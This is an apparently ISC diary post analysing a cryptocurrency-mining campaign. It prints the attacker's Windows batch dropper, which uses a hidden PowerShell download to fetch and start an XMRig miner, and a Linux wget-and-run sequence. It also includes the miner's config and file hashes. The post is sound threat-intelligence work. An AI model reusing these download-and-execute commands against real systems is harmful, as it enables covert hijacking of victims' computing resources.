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Mining or Nothing!

Published: 2018-01-11. Last Updated: 2018-01-11 07:37:15 UTC
by Xavier Mertens (Version: 1)
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Cryptocurrencies mining has been a trending attack for a few weeks. Our idling CPUs are now targeted by bad guys who are looked to generate some extra revenue by abusing our resources. Other fellow handlers already posted diaries about this topic. Renato found a campaign based on a WebLogic exploit[1] and Jim detected a peak of activity on port port 3333[2]. Yesterday, while reviewed alerts generated by my hunting scripts, I found an interesting snippet of code on Pastebin. Here is a copy of the script with some added comments in blue:

@shift /0
@echo off
// No idea why a new service is created, there is no reference to this executable?
sc create MicrsoftFTP binPath= C:\ProgramData\svchost.exe start= auto

// Let’s grab the miner
// Not very efficient because admin privileges are required to dump the file in this directory
powershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://x.x.x.x:2114/drivers.exe', 'C:\Windows\drivers.exe')

ping -n 10>nul 2>nul
set _task=drivers.exe

// Miner configuration 
set _svr=C:\Windows\drivers.exe -o bom.dnstop[.]info:4555 -u 4BHZCKCaArVd84u …(removed)... bydit7sHgu4BAo5Rh -p x -k -B
set _des=start.bat
SET status=1 

// Test if the miner is running
(TASKLIST|FIND /I "%_task%"||SET status=0) 2>nul 1>nul
ECHO %status%

// If not running, (re)start it or sleep
IF %status% EQU 1 (goto checkag ) ELSE (goto startsvr)

// Create the start.bat script and launch the miner
echo %time% 

// Original strings were in Chinese
// Translation: "******** Program started ********"
echo ********??????********

// Translation: "The program restarts at% time%, check the system log"
echo ??????? %time% ,??????? >> restart_service.txt
echo start %_svr% > %_des%
echo exit >> %_des%
start %_des%
for /L %%i in (1 1 10) do set /p a=.<nul&ping.exe /n 2>nul
echo .
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs 
cscript //b //nologo %tmp%\delay.vbs 10000 
del %_des% /Q

// Translation: "******** Program completed ********"
echo ********??????********
goto checkstart

// Simple sleep function based on a VBS one-liner script

// Translation: "% time% The program is running normally, and it will be checked after 10 seconds."
echo %time% ??????,10??????.. 
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs 
cscript //b //nologo %tmp%\delay.vbs 10000 
goto checkstart

The file referenced in the script (‘drivers.exe’) is not available anymore (HTTP 404 returned) but the server is running an HttpFileServer[3] instance which is very popular in China (I found plenty of them on Chinese servers). 

You can see multiple files and installation script to deploy mining tools in Windows but also Linux boxes. Example:

cd /tmp
wget -O xmrigDaemon  http://x.x.x.x:2114/xmrigDaemon && chmod +x xmrigDaemon
wget -O xmrigMiner  http://x.x.x.x:2114/xmrigMiner && chmod +x xmrigMiner
wget -O config.json  http://x.x.x.x:2114/config.json && chmod +x config.json
chmod +x xmrigDaemon
chmod +x xmrigMiner
chmod +x config.json
./xmrigDaemon &

Even more interesting, the configuration is publicly available (config.json) and contains a lot of details about the attacker:

    "algo": "cryptonight",                      // cryptonight (default) or cryptonight-lite
    "av": 0,                                    // algorithm variation, 0 auto select
    "doublehash-thread-mask" : null,            // for av=2/4 only, limits doublehash to given threads (mask), mask "0x3" means run doublehash on thread 0 and 1 only (default: all threads)
    "background": true,                        // true to run the miner in the background
    "colors": true,                             // false to disable colored output
    "cpu-affinity": null,                       // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null,                       // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 1,                          // donate level, mininum 1%
    "log-file": null,                           // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 100,                        // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
    "print-time": 60,                           // print hashrate report every N seconds
    "retries": 5,                               // number of times to retry before switch to backup server
    "retry-pause": 5,                           // time to pause between retries
    "safe": false,                              // true to safe adjust threads and av settings for current CPU
    "syslog": false,                            // use system log for output messages
    "threads": null,                            // number of miner threads
    "pools": [
            "url": “bom.dnstop[.]info:2222",                          // URL of mining server
            "user": “4BHZCKCaArVd84uydsakdzVHRtBJqG …(removed)… 3bBJJESH28YHbydit7sHgu4BAo5Rh",                         // username for mining server
            "pass": “Lall …(removed)… ",                        // password for mining server
            "keepalive": true,                  // send keepalived for prevent timeout (need pool support)
            "nicehash": false                   // enable nicehash/xmrig-proxy support
    "api": {
        "port": 0,                              // port for the miner API
        "access-token": null,                   // access token for API
        "worker-id": null                       // custom worker-id for API
    "cc-client": {
        "url": "",                // url of the CC Server (ip:port)
        "access-token": "mySecret",             // access token for CC Server (has to be the same in config_cc.json)
        "worker-id": null,                      // custom worker-id for CC Server (otherwise hostname is used)
        "update-interval-s": 10                 // status update interval in seconds (default: 10 min: 1)

Here is a table with files details:

Name MD5 Type VT Score
discuz 588dcdd23deb25d99b0924ef96e4681f ELF 32bits Unknown
discuz.exe 08855aa283b692347bcabb48d6f8bcdf PE32 52/68
lpost.exe 6a33d25fa28fd865a5e2fa43250e64dd PE32 51/68
master.exe b5cc55f84c0d4f4b86f76956f94b170d PE32 42/68
ss1s.exe bb2d8d8c8087073d83a7226c4a44296b PE32 15/67
svchost.exe 6a33d25fa28fd865a5e2fa43250e64dd PE32 51/68
xmrigDaemon 7dc04d39f2786eceab4fbf2cf16eded6 ELF 32bits Unknown
xmrigDaemon-2 710f2be21798478cc2f534ee2eb7b800 ELF 64bits 1/60
xmrigMiner b87982f5f938b2a7c9852a5de63bbc68 ELF 32bits Unknown
xmrigMiner-2 f8cb16918b42505abe547da37b9614a9 ELF 64bits 14/60


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

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Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024


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